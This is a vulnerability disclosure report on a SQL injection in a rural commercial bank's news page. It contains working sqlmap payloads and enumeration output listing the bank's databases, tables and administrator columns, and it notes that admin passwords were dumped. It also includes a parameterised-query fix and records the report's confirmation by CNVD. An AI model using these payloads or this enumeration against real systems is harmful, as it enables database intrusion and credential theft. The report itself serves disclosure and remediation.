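2015-10-03: Details reported to the vendor; awaiting vendor handling
2015-10-12: Vendor confirmed; details disclosed to the vendor only
2015-10-22: Details disclosed to core white hats and experts in related fields
2015-11-01: Details disclosed to regular white hats
2015-11-11: Details disclosed to intern white hats
2015-11-26: Details disclosed to the public
Finished eating, had nothing to do, so I went digging for bugs...
The main site of Inner Mongolia Hulunbuir Rural Commercial Bank has a GET-based SQL injection that leaks a large amount of database information.
The main site of Inner Mongolia Hulunbuir Rural Commercial Bank has an injection that can expose 23 databases and several hundred tables.
SQL injection URL: http://**.**.**.**/TextNewsList.aspx?NTID=11 (injection parameter: NTID)
Database: SQL Server 2008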
sqlmap identified the following injection points with a total of 41 HTTP(s) requests:
---
Place: GET
Parameter: NTID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: NTID=11 AND 9320=9320

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: NTID=11 AND 5690=CONVERT(INT,(SELECT CHAR(113)+CHAR(111)+CHAR(110)+CHAR(100)+CHAR(113)+(SELECT (CASE WHEN (5690=5690) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(108)+CHAR(111)+CHAR(113)))

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: NTID=-4137 OR 6051=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: NTID=(SELECT CHAR(113)+CHAR(111)+CHAR(110)+CHAR(100)+CHAR(113)+(SELECT (CASE WHEN (8187=8187) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(108)+CHAR(111)+CHAR(113))
---
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
23 databases in total
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
available databases [23]:
[*] a1
[*] a2
[*] ERP
[*] ERPOA
[*] examDB
[*] ICCO
[*] KQ123
[*] lctj
[*] master
[*] model
[*] msdb
[*] MySchool
[*] MZMT
[*] NS_Web_DB
[*] ReportServer
[*] ReportServerTempDB
[*] sbgl
[*] sbgl1
[*] tempdb
[*] VCDB
[*] XHDCRM
[*] ybj0470
[*] zptest
Current database: NS_Web_DB
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
current database: 'NS_Web_DB'
This database contains 21 tables
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: NS_Web_DB
[21 tables]
+---------------+
| ApplyCompany  |
| ApplyPOS      |
| ApplyPersonal |
| ApplyWithdraw |
| Article       |
| ArticleClass  |
| Branch        |
| CenterM_Roles |
| CenterM_Users |
| Class         |
| Messageboard  |
| Messages      |
| NewsCategory  |
| PicNews       |
| S_Tree        |
| Survey        |
| SurveyOption  |
| SysLog        |
| TextNews      |
| UserRoles     |
| Users         |
+---------------+
Administrator table: CenterM_Users
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: NS_Web_DB
Table: CenterM_Users
[6 columns]
+----------+---------+
| Column   | Type    |
+----------+---------+
| Count    | int     |
| ID       | varchar |
| Name     | varchar |
| PassWord | varchar |
| RID      | int     |
| Status   | int     |
+----------+---------+
Dumping the admin table to take a look: the administrators' passwords are all weak passwords.
The a1 database contains 129 tables
ERPOA contains 100 tables.
You can look at whichever one you want!
Banking systems need to take security more seriously.
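The boolean-based blind finding on NTID and its fix, as an added example that is not part of the original report or the site's code. SQLite stands in for SQL Server 2008, and the TextNews columns, sample rows and function names are assumptions made for illustration.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the TextNews table (SQLite, not SQL Server)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE TextNews (ID INTEGER PRIMARY KEY, NTID INTEGER, Title TEXT)")
    db.executemany(
        "INSERT INTO TextNews (NTID, Title) VALUES (?, ?)",
        [(11, "Branch notice"), (11, "Rate update"), (12, "Recruitment")],  # constructed rows
    )
    return db

def list_news_vulnerable(db, raw_ntid):
    # 'Before': the raw query-string value is concatenated into the SQL text,
    # so anything after the number is parsed as part of the WHERE clause.
    sql = "SELECT Title FROM TextNews WHERE NTID = " + raw_ntid + " ORDER BY ID"
    return [row[0] for row in db.execute(sql)]

def parse_ntid(raw_ntid):
    # Allow-list: NTID is a category id, so accept only a short run of ASCII digits.
    if not (raw_ntid.isascii() and raw_ntid.isdigit() and len(raw_ntid) <= 9):
        raise ValueError("NTID must be a positive integer")
    return int(raw_ntid)

def list_news_hardened(db, raw_ntid):
    # 'After': validate the type, then bind the value as a parameter so it
    # can never change the structure of the statement.
    ntid = parse_ntid(raw_ntid)
    sql = "SELECT Title FROM TextNews WHERE NTID = ? ORDER BY ID"
    return [row[0] for row in db.execute(sql, (ntid,))]

if __name__ == "__main__":
    db = make_db()
    # The first payload is the one sqlmap reported; the false variant is constructed.
    for value in ("11", "11 AND 9320=9320", "11 AND 9320=9321"):
        print("vulnerable", repr(value), "->", list_news_vulnerable(db, value))
        try:
            print("hardened  ", repr(value), "->", list_news_hardened(db, value))
        except ValueError as exc:
            print("hardened  ", repr(value), "-> rejected:", exc)
```

In the ASP.NET page itself the same two steps are `int.TryParse` on the query-string value and a `SqlParameter` on the `SqlCommand`. The 23 databases reachable through one page also show that the site's SQL login should be limited to NS_Web_DB.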
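Severity: Medium
Vulnerability Rank: 10
Confirmation time: 2015-10-12 08:26
CNVD has confirmed the situation described and has passed it to CNCERT, which forwarded it to the Inner Mongolia sub-center to coordinate follow-up handling with the organization that manages the website.
None at this time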